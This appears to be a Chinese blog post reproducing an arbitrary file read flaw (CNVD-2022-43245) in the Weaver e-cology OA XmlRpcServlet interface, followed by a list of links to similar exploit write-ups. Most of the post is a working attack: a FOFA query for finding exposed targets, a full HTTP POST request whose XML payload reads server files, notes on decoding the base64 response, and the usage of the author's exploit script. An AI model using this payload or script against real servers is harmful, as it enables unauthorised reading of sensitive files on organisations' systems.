泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)

CNVD-2022-43245

泛微e-cology XmlRpcServlet接口处存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息。

1.漏洞级别

中危

2.影响范围

e-office < 9.5 20220113

3.漏洞搜索

fofa 搜索 app="泛微-OA(e-cology)"

4.漏洞复现

这个漏洞的复现方法很简单,只需要向目标网站的XmlRpcServlet接口发送数据即可。

构造请求包:

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Length: 200

<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.getAttachment</methodName><params><param><value><string>c://windows/win.ini</string></value></param></params></methodCall>

正常的响应结果如下:

注:下面的xml数据 元素之间不能使用tab或空格、回车,会导致服务器响应错误,因为在CDATA部分,文本将被视为原始字符数据,不会被解析器处理或解释。

这种情况下会导致异常响应,如下图:

上面复现成功的状态下,读取到的就是数据的base64编码,我们可以通过base64解密获取文件内容。

5.快捷利用

随文章附赠一个我写的漏洞复现脚本,可以指定url和filepath来读取文件,并直接将base64转换成正常文本。

执行

python3 ecology-xmlrpcservlet-readfile.py -u url -f file_path
#如果不选择文件地址 则默认为c://windows/win.ini

执行效果如下:

感兴趣的可以下载一下试试,或者github直接搜索ecology-xmlrpcservlet-readfile.py就能找到相应的文件了。

如果有问题欢迎随时交流~

相关推荐
Mitch3113 天前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
摘星怪sec1 个月前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
阿呆不呆@qq4 个月前
springblade-JWT认证缺陷漏洞CVE-2021-44910
cve·漏洞复现
SAP Hua4 个月前
泛微E9如何更新缓存
泛微oa
网友小黑4 个月前
Tomcat常见漏洞复现
web安全·tomcat·漏洞复现
运维Z叔5 个月前
记一次因敏感信息泄露而导致的越权+存储型XSS
运维·前端·数据库·安全·渗透·xss·漏洞复现
SuperherRo5 个月前
【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞
sql·泛微oa
凝聚力安全团队5 个月前
【漏洞复现】通达OA v2017 video_file.php 任意文件下载漏洞
web安全·web·漏洞·漏洞复现·web渗透
一个叶绿体6 个月前
JBoss JMXInvokerServlet 反序列化漏洞
漏洞复现